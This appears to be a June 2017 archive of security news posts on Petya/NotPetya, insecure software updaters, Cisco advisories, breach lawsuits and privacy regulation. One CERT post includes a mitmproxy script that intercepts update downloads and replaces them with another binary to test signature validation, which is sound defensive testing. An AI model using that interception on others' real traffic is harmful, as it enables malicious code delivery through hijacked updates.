Monthly Archives: June 2017

Ransomware Health Data Breach Affects 500,000 Patients

On June 26, 2017, Airway Oxygen, a provider of oxygen therapy and home medical equipment, reported that it was the subject of a ransomware attack affecting 500,000 patients’ protected health information. The attack is the second largest health data breach recorded by the Office for Civil Rights (“OCR”) this year, and the largest ransomware incident recorded by OCR since it began tracking incidents in 2009.

According to Airway Oxygen’s statement, the company discovered the presence of ransomware on its systems in April 2017. The company’s investigation determined that attackers were able to access 500,000 patients’ names, addresses, birth dates, telephone numbers, medical diagnoses and treatments, and health insurance policy numbers. The personal information of approximately 1,160 current and former employees was also compromised. The company has not commented on whether the demanded ransom was paid.

This reported incident follows last month’s WannaCry ransomware attack, which affected tens of thousands of computers in over 100 countries. It also comes on the heels of a massive malware attack reported on June 27, which shut down computers all over the world. The malware involved in the June 27 attack mimicked many characteristics of ransomware, but its ultimate objective was to wipe the hard drives of infected networks, without giving victims the opportunity to pay to retrieve their data. Researchers believe that attackers designed the malware to mimic ransomware in order to leverage the widespread media attention garnered by the WannaCry attack.

As the events of the past two months have shown, ransomware is a growing concern. These recent high profile attacks are part of an overall trend in the evolving threat landscape. Businesses and other organizations should take into account the myriad legal considerations in their efforts to prevent, investigate and recover from these disruptive attacks.

Petya Malware Variant (Update C)

This updated alert is a follow-up to the updated alert titled ICS-ALERT-17-181-01B Petya Malware Variant that was published July 5, 2017, on the NCCIC/ICS-CERT web site. ICS-CERT is aware of reports of a variant of the Petya malware that is affecting several countries. ICS-CERT is releasing this alert to enhance the awareness of critical infrastructure asset owners/operators about the Petya variant and to identify product vendors that have issued recommendations to mitigate the risk associated with this malware.

The Consequences of Insecure Software Updates

In this blog post, I discuss the impact of insecure software updates as well as several related topics, including mistakes made by software vendors in their update mechanisms, how to verify the security of a software update, and how vendors can implement secure software updating mechanisms.

Earlier in June of this year, I published two different vulnerability notes about applications that update themselves insecurely:

  • VU#846320 - Samsung Magician fails to update itself securely
  • VU#489392 - Acronis True Image fails to update itself securely

In both of these cases, the apparent assumption the software makes is that it is operating on a trusted network and that no attacker would attempt to modify the act of checking for or downloading the updates. This is not a valid assumption to make.

Consider the situation where you think you're on your favorite coffee shop's WiFi network. If you have a single application with an insecure update mechanism, you are at risk of becoming a victim of what's known as an evilgrade attack. That is, you may inadvertently install code from an attacker during the software update process. Given that software updaters usually run with administrative privileges, the attacker's code will subsequently run with administrative privileges as well. In some cases, this can happen with no user interaction. This risk has been publicly known since 2010.

The dangers of an insecure update process are much more severe than an individual user being compromised while on an untrusted network. As the recent ExPetr/NotPetya/Petya wiper malware has shown, the impact of insecure updates can be catastrophic. Let me expand on this topic by discussing several important aspects of software updates:

  1. What mistakes can software vendors make when designing a software update mechanism?
  2. How can I verify that my software performs software updates securely?
  3. How should vendors implement a secure software update mechanism?

Insecure Software Updates and Petya

Microsoft has reported that the Petya malware originated from the update mechanism for the Ukrainian tax software called MEDoc. Because of the language barrier, I was not able to thoroughly exercise the software. However, with the help of CERT Tapioca, I was able to see the network traffic that was being used for software updates. This software makes two critical mistakes in its update mechanism: (1) it uses the insecure HTTP protocol, and (2) the updates are not digitally signed.

These are the same two mistakes that the vulnerable Samsung Magician software (VU#846320) and the vulnerable Acronis True Image software (VU#489392) contain. Let's dig into the two main flaws in software updaters:

Use of an Insecure Transport Layer

HTTP is used in a number of software update mechanisms, as opposed to the more-secure HTTPS protocol. What makes HTTPS more secure? Properly-configured HTTPS communications attempt to achieve three goals:

  1. Confidentiality - Traffic is protected against eavesdropping.
  2. Integrity - Traffic content is protected against modification.
  3. Authenticity - The client verifies the identity of the server being contacted.

Let's compare an update mechanism that uses properly configured HTTPS with one that uses HTTP, or HTTPS without certificate validation:

Properly-configured HTTPS:
  • Confidentiality - Software update request content is not visible to attackers.
  • Integrity - Software update requests cannot be modified by an attacker.
  • Authenticity - Software update traffic cannot be redirected by an attacker.
HTTP, or HTTPS without certificate validation:
  • Confidentiality - An attacker can view the contents of software update requests.
  • Integrity - An attacker can modify update requests or responses to modify the update behavior or outcome.
  • Authenticity - An attacker can intercept and redirect software update requests to a malicious server.

Based on its inability to address these three goals, it is clear that HTTP is not a viable solution for software update traffic.
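
To make the transport-layer requirement concrete, here is a minimal sketch (in Python, with a hypothetical update URL rather than any vendor's real endpoint) of an update check that insists on validated HTTPS:

# Minimal sketch of an update check that refuses plaintext HTTP.
# The URL below is a hypothetical placeholder, not a real update endpoint.
import requests

UPDATE_URL = "https://updates.example.com/product/latest.json"

def fetch_update_metadata(url):
    if not url.lower().startswith("https://"):
        raise ValueError("refusing to check for updates over plaintext HTTP")
    # requests validates the server certificate against trusted CAs by default;
    # passing verify=False would silently reintroduce the MITM risk described above.
    response = requests.get(url, timeout=30)
    response.raise_for_status()
    return response.json()

if __name__ == "__main__":
    print(fetch_update_metadata(UPDATE_URL))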

Lack of Digital Signatures for Updates

If software updates are not digitally signed, or if the software update mechanism does not validate signatures, an attacker can replace a software update with malware. A simple test that I like to perform when testing software updaters is to see if the software will download and install calc.exe from Windows instead of the expected update. If calc.exe pops up when the update occurs, we have evidence of a vulnerable update mechanism!
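
For illustration, here is a minimal sketch of what signature validation before installation can look like, assuming an Ed25519 public key pinned inside the client and a detached signature file; the key bytes and file names are placeholders:

# Sketch of validating a detached Ed25519 signature before installing an update.
# PINNED_PUBLIC_KEY is a placeholder; a real client ships the vendor's actual key.
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey

PINNED_PUBLIC_KEY = bytes.fromhex("00" * 32)  # placeholder 32-byte Ed25519 public key

def update_is_authentic(update_path, signature_path):
    public_key = Ed25519PublicKey.from_public_bytes(PINNED_PUBLIC_KEY)
    with open(update_path, "rb") as f:
        payload = f.read()
    with open(signature_path, "rb") as f:
        signature = f.read()
    try:
        public_key.verify(signature, payload)  # raises InvalidSignature if tampered
        return True
    except InvalidSignature:
        return False

# Only install the update when update_is_authentic("update.bin", "update.bin.sig") is True.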

Verifying Software Updaters

CERT Tapioca can be used to easily observe if an application uses HTTP or non-validated HTTPS traffic for updates. Any update traffic that appears in the Tapioca mitmproxy window is an indication that the update uses an insecure transport layer. As long as the mitmproxy root CA certificate is not installed on the client system, the only traffic that will appear in the mitmproxy window will be HTTP traffic and HTTPS traffic that is not checked for a trusted root CA, both of which are insecure.

Determining whether an application validates the digital signatures of updates requires a little more work. Essentially, you need to intercept the update and redirect it to an update under your control that is either unsigned or signed by another vendor.
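
Since Tapioca is built on mitmproxy, one way to perform that interception is a small mitmproxy addon that swaps the downloaded update for a benign stand-in that is not signed by the vendor (calc.exe works for the test described earlier). This is a sketch for a lab setup only; the URL pattern and stand-in path are assumptions you would adapt to the updater under test:

# swap_update.py - run with: mitmdump -s swap_update.py
# Replaces any response that looks like an update download with a benign stand-in
# binary, to test whether the client validates signatures before installing.
from mitmproxy import http

STAND_IN = r"C:\Windows\System32\calc.exe"  # benign binary not signed by the vendor under test

def response(flow: http.HTTPFlow) -> None:
    url = flow.request.pretty_url.lower()
    if "update" in url and url.endswith(".exe"):  # adjust the match for the updater under test
        with open(STAND_IN, "rb") as f:
            flow.response.content = f.read()
        flow.response.headers["content-type"] = "application/octet-stream"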

A "Belt and Suspenders" Approach to Updates

If an update mechanism uses HTTPS, that should ensure it is only communicating with a legitimate update server, right? And shouldn't that be enough to ensure a secure update? Well, not exactly.

First, HTTPS is not without flaws. There have been a number of flaws in various protocols and ciphersuites supported by HTTPS, including FREAK, DROWN, BEAST, CRIME, BREACH, and POODLE. These known flaws, which have since been fixed in HTTPS communications that use modern TLS protocols, can weaken the confidentiality, integrity, and authenticity goals that HTTPS aims to provide when older protocols or ciphersuites remain enabled. It is also important to realize that even without such flaws, HTTPS without pinning can ensure website authenticity only to the level that the PKI and certificate authority architecture allow. See Moxie Marlinspike's post SSL and the Future of Authenticity for more details.

HTTPS flaws and other weaknesses aside, using HTTPS without signature-validated updates leaves a large open hole that can be attacked. What happens if an attacker can compromise an update server? If software update signatures are not validated, a compromise of a single server can result in malicious software being deployed to all clients. There is evidence that this is exactly what happened in the case of MEDoc.

[Image: virus_attack.png] Source: archive.org / Google Translate

Using HTTPS can help to ensure both the transport layer security as well as the identity of the update server. Validating digital signatures of the updates themselves can help limit the damage even if the update server is compromised. Both of these aspects are vital to the operation of a secure software update mechanism.

Conclusion and Recommendations

Despite evilgrade being a publicly-known attack for about seven years now, it is still a problem. Because of the nature of how software is traditionally installed on Windows and Mac systems, we live in a world where every application may end up implementing its own auto-update mechanism independently. And as we are seeing, software vendors are frequently making mistakes in these updaters. Linux and other operating systems that use package-management systems appear to be less affected by this problem, due to the centralized channel through which software is installed.

Recommendations for Users

So what can end users do to protect themselves? Here are my recommendations:

  • Especially when on untrusted networks, be wary of automatic updates. When possible, retrieve updates using your web browser from the vendor's HTTPS website. Popular applications from major vendors are less likely to contain vulnerable update mechanisms, but any software update mechanism has the possibility of being susceptible to attack.
  • For any application you use that contains an update mechanism, verify that the update is at least not vulnerable to a MITM attack by performing the update using CERT Tapioca as an internet source. Virtual machines make this testing easier.

Recommendations for Developers

What can software developers do to provide software updates that are secure? Here are my recommendations:

  • If your software has an update mechanism, ensure that it both:
    • Uses properly validated HTTPS for a communications channel instead of HTTP
    • Validates digital signatures of retrieved updates before installing them
  • To protect against an update server compromise affecting your users, ensure that the code signing key is not present on the update server itself. To increase protection against malicious updates, keep the code signing key offline, or otherwise unavailable to an attacker (a signing sketch follows this list).
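
As a companion to the verification sketch earlier in this post, here is roughly what the offline signing step might look like; key handling is simplified for illustration, the file names are placeholders, and in practice the private key would live in an HSM or other protected store, never on the update server:

# Sketch of the release-time signing step, run on an offline build machine.
# Only update.bin and update.bin.sig ever reach the update server.
from cryptography.hazmat.primitives import serialization

def sign_release(update_path, private_key_path):
    with open(private_key_path, "rb") as f:
        private_key = serialization.load_pem_private_key(f.read(), password=None)
    with open(update_path, "rb") as f:
        payload = f.read()
    with open(update_path + ".sig", "wb") as f:
        f.write(private_key.sign(payload))  # detached Ed25519 signature

# Because the signing key never touches the update server, compromising that server
# is not enough to push a malicious update that clients will accept.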

Enterprise Security Weekly #51 – Idempotency

Apollo Clark joins us to discuss managing AWS cloud resources, docker security in the enterprise is our topic for the week, and we discuss the latest enterprise news!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode51
Visit https://www.securityweekly.com for all the latest episodes!

Cisco Netflow Generation Appliance Software 1.0(2) unresponsive Denial Of Service Vulnerability

A vulnerability in the Stream Control Transmission Protocol (SCTP) decoder of the Cisco NetFlow Generation Appliance (NGA) with software before 1.1(1a) could allow an unauthenticated, remote attacker to cause the device to hang or unexpectedly reload, causing a denial of service (DoS) condition. The vulnerability is due to incomplete validation of SCTP packets being monitored on the NGA data ports. An attacker could exploit this vulnerability by sending malformed SCTP packets on a network that is monitored by an NGA data port. SCTP packets addressed to the IP address of the NGA itself will not trigger this vulnerability. An exploit could allow the attacker to cause the appliance to become unresponsive or reload, causing a DoS condition. User interaction could be needed to recover the device using the reboot command from the CLI. The following Cisco NetFlow Generation Appliances are vulnerable: NGA 3140, NGA 3240, NGA 3340. Cisco Bug IDs: CSCvc83320.

Information Security 101 with Lisa Sotto: Legal Risks

In the first segment of this three-part series, Lisa Sotto, head of the Global Privacy and Cybersecurity practice at Hunton & Williams, discusses information security law issues with The Electronic Discovery Institute. “[Information security] is a significant risk issue” and should be “at the top of the radar screen” for C-suites and boards of directors, says Sotto. In this segment, Sotto addresses U.S. and global data breach notification laws.

Watch the full video.

Petya Ransomware: What You Need to Know and Do

By: Andrew Hay

Unless you’ve been away from the Internet earlier this week, you’ve no doubt heard by now about the global ransomware outbreak that started in Ukraine and subsequently spread west across Western Europe, North America, and Australia yesterday. With similarities reminiscent of its predecessor WannaCry, this ransomware attack shut down organizations ranging from the Danish shipping conglomerate Maersk Line to a Tasmanian-based Cadbury chocolate factory.

I was asked throughout the course of yesterday and today to help clarify exactly what transpired. The biggest challenge with any surprise malware outbreak is the flurry of hearsay, conjecture, speculation, and just plain guessing by researchers, analysts, and the media.

At a very high level, here is what we know thus far:

  • The spread of this campaign appears to have originated in Ukraine but has migrated west to impact a number of other countries, including the United States where pharmaceutical giant Merck and global law firm DLA Piper were hit
  • The initial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MeDoc
  • This appears to be a piece of malware utilizing the EternalBlue exploit disclosed by the Shadow Brokers back in April 2017 when the group released several hacking tools obtained from the NSA
  • Microsoft released a patch in March 2017 to mitigate the discovered remote code execution vulnerabilities that existed in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handled certain requests
  • The malware implements several lateral movement techniques:
    • Stealing credentials or re-using existing active sessions
    • Using file-shares to transfer the malicious file across machines on the same network
    • Using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines
  • Experts continue to debate whether or not this is a known malware variant called Petya, but several researchers and firms claim that this is a never-before-seen variant that they are calling GoldenEye, NotPetya, Petna, or some other random name such as Nyetya
  • The jury is still out on whether or not the malware is new or simply a known variant

 

Who is responsible?

The million dollar question on everyone’s mind is “was this a nation-state backed campaign designed to specifically target Ukraine?” We at LEO believe that to be highly unlikely for a number of reasons. An opportunistic ransomware campaign with some initial software package targets is a far more likely scenario than a state-sponsored actor looking to destabilize a country.

Always remember the old adage from Dr. Theodore Woodward: When you hear hoofbeats, think of horses not zebras.

If you immediately start looking for Russian, Chinese, or North Korean state-sponsored actors around every corner, you’ll inevitably construct some attribution and analysis bias. Look for the facts, not the speculation.

What does LEO recommend you do?

We recommend that customers who have not yet installed security update MS17-010 do so as soon as possible. Until you can apply the patch, LEO also recommends the following steps to help reduce the attack surface:

  • Disable SMBv1 with the steps documented at Microsoft Knowledge Base Article 2696547
  • Block incoming SMB traffic from the public Internet on ports 445 and 139 by adding a rule on your border routers, perimeter firewalls, and any intersecting traffic points between a higher security network zone and a lower security network zone (a quick verification sketch follows this list)
  • Disable remote WMI and file sharing, where possible, in favor of more secure file sharing protocols
  • Ensure that your logging is properly configured for all network-connected systems including workstations, servers, virtualized guests, and network infrastructure such as routers, switches, and firewalls
  • Ensure that your antimalware signatures are up-to-date on all systems (not just the critical ones)
  • Review your patch management program to ensure that emergency patches to mitigate critical vulnerabilities and easily weaponized attacks can be applied in an expedited fashion
  • Finally, consider stockpiling some cryptocurrency, like Bitcoin, to reduce any possible transaction downtime should you find that your organization is forced to pay the ransom. Attempting to acquire Bitcoin during an incident may be time-prohibitive
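
The sketch below (plain Python sockets, with a placeholder address you would replace with your own public ranges) is one quick way to confirm from outside the perimeter that the SMB ports mentioned above are actually filtered:

# Quick external check that TCP 445 and 139 are not reachable from the Internet.
# Run it from a host outside your network; the target address is a placeholder.
import socket

SMB_PORTS = (445, 139)

def exposed_smb_ports(host, timeout=2.0):
    open_ports = []
    for port in SMB_PORTS:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the TCP connect succeeded
                open_ports.append(port)
    return open_ports

if __name__ == "__main__":
    for target in ("203.0.113.10",):  # replace with your own public addresses
        ports = exposed_smb_ports(target)
        print(target, "EXPOSED:" if ports else "filtered/closed", ports)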

 

Should your organization need help or clarification on any of the above recommendations, please don’t hesitate to reach out to LEO Cyber Security for immediate assistance.

Further reading

The post Petya Ransomware: What You Need to Know and Do appeared first on LEO Cyber Security.

Follow up to the vuln disclosure post

Summary of responses from this post: http://carnal0wnage.attackresearch.com/2017/06/vulnerability-disclosure-free-bug.html

I wanted to document/summarize some of the responses I received and some of the insights I gained via self observation and my interactions with others on the topic.

I received a few replies (fewer than I hoped for, though). To summarize a few:

-I'm not a greedy bastard for thinking it would "be nice" to get paid for reporting a vuln, but I should not expect it.

-Bug Bounty awards are appreciation for the work, not a right.

-Someone made a nice analogy comparing losing AWS/Slack keys to losing a cell phone or a cat. Every person might value the return of that cat or phone differently.

-I'm super late to the game if I want to get on the "complain about bug bounties / compensation" train.  **I think this is not quite the same situation but I appreciate the comment**

-The bigger the company, the harder it is to issue an ad-hoc reward if they don't have an established process.

-They [the vulns] have value - just not monetary. The value is to the end-user.

-Generally speaking, I [the author of the comment] think quite a lot of the BB crowd have a self-entitled, bad attitude.

-Always ask yourself if this will hurt innocent people. If so, report it, but make sure the public knows that they f*cked it up.

This blog post reply: https://blog.anantshri.info/response-vulnerability-disclosure-free-bug-reports-greedy-bastard/
---

I got a variety of responses, from "it's the right thing to do"... up to "if they don't pay up, they don't get the info." Collectively, I don't think we are any closer to an answer.

To get a bit more personal on the subject. I think this piece from Ferris Bueller's Day Off sums it up to an extent:

https://www.youtube.com/watch?v=H19uKs99vIw&feature=youtu.be&t=1m15s

"The problem is with me"


I've been giving quite a bit of thought to which component of the process brings me the most excitement and enjoyment. I believe I've identified it, and I will focus on that piece and work to manage any expectations I place on others.

I very much appreciate everyone that engaged in the conversation with me.

More things to think about for sure :-)


Hack Naked News #131 – June 28, 2017

DoD networks have been compromised, the Shadow Brokers continue their exploits, a Pennsylvania healthcare system gets hit with Petya, and more. Jason Wood of Paladin Security joins us to discuss nations' offensive technical strengths and defensive weaknesses on this episode of Hack Naked News!
Full Show Notes: https://wiki.securityweekly.com/HNNEpisode131
Visit https://www.securityweekly.com for all the latest episodes!

Email Provider Disables Ransomware Mailbox – Good or Bad?

Here's a headline that will likely make you cheer.
Or it'll make your heart sink as you realize your files are now gone. Forever.

Or maybe it'll get you thinking like it did for me...
Email Provider Shuts Down Petya Inbox Preventing Victims From Recovering Files
I read this line and started thinking ... oh my God ... what are some of the victims going to do?!
"The German email provider's decision is catastrophic news for Petya victims, as they won't be able to email the Petya author in the case they want to pay the ransom to recover sensitive files needed for urgent matters."

While I believe Posteo had good intentions, the net result will be a bad situation made significantly worse. In a ransomware scenario you have three options:

  • Pay up (hope you get your stuff back)
  • Ignore it and restore from back up (and hope your stuff is backed up)
  • Hope like hell someone cracks the encryption/software/attacker in time to get your files back without having to pay (hey, it's happened before)
The problem is that if you're a Petya victim, option #1 is no longer open to you. There are several scenarios where a victim could have no choice but to pay up, like when backups aren't available (or they haven't planned that far ahead). Now, a few friends on Twitter made a valid argument for what Posteo did - including that they wanted to stop funding an attacker and ultimately had a criminal on their hands they wanted to shut down. All well and good - but think of the impact.

While I don't think it hurts the email provider to continue to keep the mailbox open, closing it down is catastrophic. It's irresponsible. And maybe even a little mean-spirited. Unless you're willing to argue that you've never been a victim, or that you "deserved what you got" (which is a BS argument) this action by Posteo is insane.

On the other side of this coin, there are very good reasons to keep the mailbox open. For example, it could provide some insight into the attacker/criminal. Maybe the attacker accidentally accesses the inbox from their home cable modem and investigators can track them down that way. You never know. There's also the obvious reason that people should get their files back if they have no alternative but to pay, and we know that is the case in many, many, many cases.

What do you think? I think what Posteo did was rash and maybe a little stupid. Clearly they're not thinking about the victims here - and that's irresponsible.


-- Edit 27-June-17 @ 11:46pm

So this is interesting and helps understand the scope of what's affected and who is impacted. Still think it was a bright idea to kill that mailbox?
https://www.buzzfeed.com/otilliasteadman/heres-just-who-got-hit-by-that-latest-massive-cyberattack

Record Data Breach Settlement in Anthem Class Action

On June 23, 2017, Anthem Inc., the nation’s second largest health insurer, reached a record $115 million settlement in a class action lawsuit arising out of a 2015 data breach that exposed the personal information of more than 78 million people. Among other things, the settlement creates a pool of funds to provide credit monitoring and reimbursement for out-of-pocket costs for customers, as well as up to $38 million in attorneys’ fees.

Anthem announced in February 2015 that it had been the target of an external cyber attack. The personal information obtained by attackers included names, dates of birth, Social Security numbers and health care ID numbers. Following the breach, Anthem offered affected individuals two years of credit monitoring. Under the settlement agreement, plaintiffs will be offered an additional two years of credit monitoring and identity protection services. Class members who already have credit monitoring services can submit a claim for monetary compensation instead of receiving the additional services.

The settlement also requires Anthem to make certain changes to its data security systems and cybersecurity practices for at least three years. These changes include (1) implementing data retention periods, (2) strict access requirements, (3) mandatory information security training for all associates and (4) annual IT security risk assessments. During this three year period, Anthem must engage an independent consultant to verify it is in compliance with the terms of the settlement agreement, and remediate 95 percent of critical findings within three years. The settlement further requires Anthem to allocate a certain amount of funds for information security and increase its funding for every additional 5,000 users if Anthem increases its users by more than 10 percent, whether by acquisition or growth.

The U.S. District Court for the Northern District of California, San Jose Division, is scheduled to hear a motion for preliminary approval of the settlement on August 17, 2017. If approved, a third-party administrator will be appointed to manage the settlement.

Tempur Sealy Data Breach: Putative Class Action Filed

On June 12, 2017, a putative class action was filed in the U.S. District Court for the Northern District of Georgia against Tempur Sealy International, Inc. and Aptos, Inc. Tempur Sealy is a mattress, bedding and pillow retailer based in Lexington, Kentucky. Aptos is headquartered in Atlanta, Georgia, and formerly hosted and maintained Tempur Sealy’s website and online payment system. The plaintiff alleges that the breach was discovered in November of 2016 and involved the exposure of payment card data and other PII of an undisclosed number of Tempur Sealy customers.   

The complaint advances claims for violations of 49 jurisdictions’ consumer protection laws, 39 jurisdictions’ breach notification laws, as well as causes of action for negligence, breach of implied contract and unjust enrichment. The plaintiff seeks to certify statewide consumer protection and data breach notification classes for New York residents, as well as a nationwide class (or alternative statewide classes) for the negligence, breach of implied contract and unjust enrichment claims. The plaintiff alleges that the defendants failed to follow best practices and industry security standards, including PCI DSS. The plaintiff also complains about violations of Tempur Sealy’s own posted privacy policy. The complaint additionally requests injunctive relief and various forms of monetary damages.

The named plaintiff alleges at least one payment card charge which, “upon information and belief,” she believes was fraudulent. The allegations do not specifically identify whether the charge was related to the exposed payment card information. However, the plaintiff does allege that the identified charge was not reimbursed. The plaintiff’s other alleged injuries are related to benefit-of-the-bargain/overpayment theories and loss of PII value (both of which are generally unpopular arguments with courts), time spent monitoring accounts, card replacement costs and an increased risk of future harm.

Implementation of the EU GDPR: 30-Minute Guidance Review

As companies in the EU and the U.S. prepare for the application of the EU General Data Protection Regulation (“GDPR”) in May 2018, Hunton & Williams’ Global Privacy and Cybersecurity partner Aaron Simpson discusses with Forcepoint the key, significant changes from the EU Directive that companies must comply with before next year. Accountability, expanded data subject rights, breach notification, sanctions and data transfer mechanisms are a few requirements that Simpson explores in detail. He reminds companies that, in the coming year, it will be very important to “monitor…and stay aware of the guidance being produced by regulators,” but also that the guidance is not a substitute for the specific preparations that each business will need to perform in order to comply with the GDPR.

Listen to the full 30-minute webinar.

Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard

Backstory:

Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.

The above is important as it relates to the rest of the post and topic(s).

I was relaying some frustrations to a close non-infosec friend about my experience of discovering that companies had made some fairly serious Internet security uh ohs... like misconfigured S3 buckets full of db backups and creds, root AWS keys checked into GitHub, or Slack tokens checked into GitHub/pastebin that would give companies a "REALLY bad day". These companies had been receptive to the reporting and fixed the problem but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.

My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.

So this blog post is an attempt for me to work thru some of these issues and have a discussion about the topics.


Questions I don't necessarily have answers for:

1. Does a vulnerability I wasn't asked to find have value?

2. If someone outside your company reports an issue and you fix it, does that issue/report now have value/deserve to be paid for (bug bounty)?

3a. If #1 or #2 is Yes, when a business doesn't have a Bug Bounty program, are they morally/ethically/peer pressure obligated to pay something?  If they have a BB program I think most people agree yes. But what about when they don't?

3b. Does the size of the business make a difference? If so, what level?  mom and pop maybe not, VC funded startup?  30 billion dollar Hedge Fund?

4. Is a "Thanks Bro!" enough, or have we evolved as a society where basically everything deserves some sort of monetary reward? After being an observer for two BB programs...."f**k you pay me" seems to be the current attitude. If they did a public "Thanks Bro" does that make a difference/satisfy my ego?

5a. Is "making the Internet safer" enough of a reward?

5b. Does a company with an open S3 bucket make the Internet less safe? Does a company leaking client data make the Internet less safe? [I think Yes]
Does a company leaking their OWN data make the Internet less safe? [It's good for their competitors]

If they get ransomware'd or their EC2 infra shut down/turned off/deleted Code Spaces-style, am I somewhat (morally) responsible if I didn't report it?

6. Does ignoring a pretty significant issue for a company make me a "bad person"?

7a. Am I a "bad person" if I want $$$ for reporting the issue?

7b. If yes, is that because I make $X and I'm being a greedy bastard? What if I made way less money?

7c. Does ignoring/not reporting an issue because I probably won't get $$ make me a "bad person"? Numbers 1-3 come into play here for sure.


In my last two jobs, I've worked for companies that had Bug Bounty programs, so my opinion on the above is DEFINITELY shaped by working for companies that "get it," understand and care about their security posture, and do feel that security issues reported by outside researchers have monetary value. An added benefit of having a program, especially through one of the BB vendors, is that you get to NDA the researchers and you get to control disclosure.


Thoughts/comments VERY welcome on this one.  Leaving comments seems out of style now but I do have open DM on twitter if you want to go that route.  I have a few real world experiences with this where I let some companies know some pretty serious stuff (slack token with access to corp slack, S3 buckets with creds/db backups, and root aws keys checked into github for weeks) where it was fixed with no drama but no bounty paid.


-CG

Startup Security Weekly #45 – Walking In Pajamas

Fred Kneip of CyberGRX joins us. In the news, why most startups fail, conference season tips, the question you need to ask before solving any problem, and updates from GreatHorn, Cybereason, Amazon, and more!
Full Show Notes: https://wiki.securityweekly.com/SSWEpisode45
Visit https://www.securityweekly.com for all the latest episodes!

Cisco Email Security Appliance 9.7.1-hp2-207 Bypass a restriction or similar Vulnerability

A vulnerability in the content scanning engine of Cisco AsyncOS Software for Cisco Email Security Appliances (ESA) could allow an unauthenticated, remote attacker to bypass configured message or content filters on the device. Affected Products: This vulnerability affects all releases prior to the first fixed release of Cisco AsyncOS Software for Cisco Email Security Appliances, both virtual and hardware appliances, if the software is configured to apply a message filter or content filter to incoming email attachments. The vulnerability is not limited to any specific rules or actions for a message filter or content filter. More Information: CSCuz16076. Known Affected Releases: 9.7.1-066 9.7.1-HP2-207 9.8.5-085. Known Fixed Releases: 10.0.1-083 10.0.1-087.

UK ICO Revises Subject Access Guidance Following Court Rulings

On June 20, 2017, the UK Information Commissioner’s Office (“ICO”) published an updated version of its Code of Practice on Subject Access Requests (the “Code”). The updates are primarily in response to three Court of Appeal decisions from earlier this year regarding data controllers’ obligations to respond to subject access requests (“SARs”). The revisions more closely align the ICO’s position with the court’s judgments.

Key changes in the Code include:

  • Disproportionate effort: Under the Data Protection Act 1998, there is an exemption from the requirement to respond to a SAR where this would involve ‘disproportionate effort.’ Despite this, the Code previously suggested that there were no circumstances where it would be reasonable to deny access to requested information for the sole reason that responding to the request would be difficult. The updated Code relaxes this position, stating that “there is scope for assessing whether, in the circumstances of a particular case, supplying a copy of the requested information in permanent form would result in so much work or expense as to outweigh the requester’s right of access to their personal data.” The ICO expects, however, that all controllers will evaluate the circumstances of each SAR, balancing any perceived difficulties in complying with the request against the data subject’s benefits in receiving the information.
  • Dialogue with the data subject: The Code now stresses that the ICO considers it a best practice for controllers to enter into dialogue with data subjects following a SAR, allowing the data subject to describe the particular information required and potentially restricting the scope of the SAR. As the Code notes, such a practice has the potential to ensure that the response would not involve disproportionate effort on the controller’s part. It also sets out that where the ICO receives a complaint about a controller’s handling of a SAR, it may take into account the willingness of the controller to engage with the data subject, as well as the data subject’s response.
  • Information management: The Code states that information management systems should be configured so that the controller can easily locate and extract relevant personal data where a SAR has been made, including any archived or back-up data relating to the data subject. It further suggests that systems should allow for the redaction of third-party data where this is deemed necessary.

Although SARs will continue to require, in some cases, considerable efforts from data controllers to provide responsive information, the impact of the Court of Appeal’s decisions has at least tempered the ICO’s previously hardline approach towards a data controller’s obligations in relation to a SAR.

Enterprise Security Weekly #50 – Losing More Hair

Brian Ventura of SANS Institute and Ted Gary of Tenable join us. In the news, five ways to maximize your IT training, pocket-sized printing, 30 years of evasion techniques, and more on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode50
Visit https://www.securityweekly.com for all the latest episodes!

FTC Releases Guidance on COPPA Compliance

On June 21, 2017, the Federal Trade Commission updated its guidance, Six-Step Compliance Plan for Your Business, for complying with the Children’s Online Privacy Protection Act (“COPPA”). The FTC enforces the COPPA Rule, which sets requirements regarding children’s privacy and safety online. The updated guidance adds new information on situations where COPPA applies and steps to take for compliance. The changes include:

  • New products and technologies. COPPA applies to the collection of personal information through a “website or online service.” The term is defined broadly, and the updates to the guidance clarify that technologies such as connected toys and other Internet of Things devices can be covered by COPPA.
  • New parental consent methods. Before collecting the personal information of children under the age of 13, COPPA requires that businesses obtain parental consent. The revised guidance addresses two newly-approved methods for obtaining parental consent: (1) answering a series of knowledge-based challenge questions that would be difficult for someone other than the parent to answer; or (2) verifying a picture of a driver’s license or other photo ID submitted by the parent and then comparing that photo to a second photo submitted by the parent, using facial recognition technology.

These updates follow a recent letter from Senator Mark Warner asking the FTC to strengthen efforts to protect children’s personal information in the face of new technologies such as Internet-connected “Smart Toys.”

Germany Issues Ethics Report on Automated and Connected Cars

On June 20, 2017, the German Federal Ministry of Transport and Digital Infrastructure issued a report on the ethics of Automated and Connected Cars (the “Report”). The Report was developed by a multidisciplinary Ethics Commission established in September 2016 for the purpose of developing essential ethical guidelines for the use of automated and connected cars.

The Report acknowledges that self-driving technologies will lead to increased road safety, but also raise a wide range of ethical and privacy concerns that must be addressed. According to its chair, the Ethics Commission “has developed initial guidelines that permit the use of automated transportation systems, but that also take into account the special requirements of safety, human dignity, individual self-determination and data autonomy.”

Key points from the Report’s 20 ethical guidelines are as follows:

  • Automated and connected transportation (driving) is ethically required when these systems cause fewer accidents than human drivers.
  • Damage to property must be allowed before injury to persons: in situations of danger, the protection of human life takes highest priority.
  • In the event of unavoidable accidents, all classification of people based on their personal characteristics (age, gender, physical or mental condition) is prohibited.
  • In all driving situations, it must be clearly defined and recognizable who is responsible for the task of driving—the human or the computer. Who is driving must be documented and recorded (for purposes of potential questions of liability).
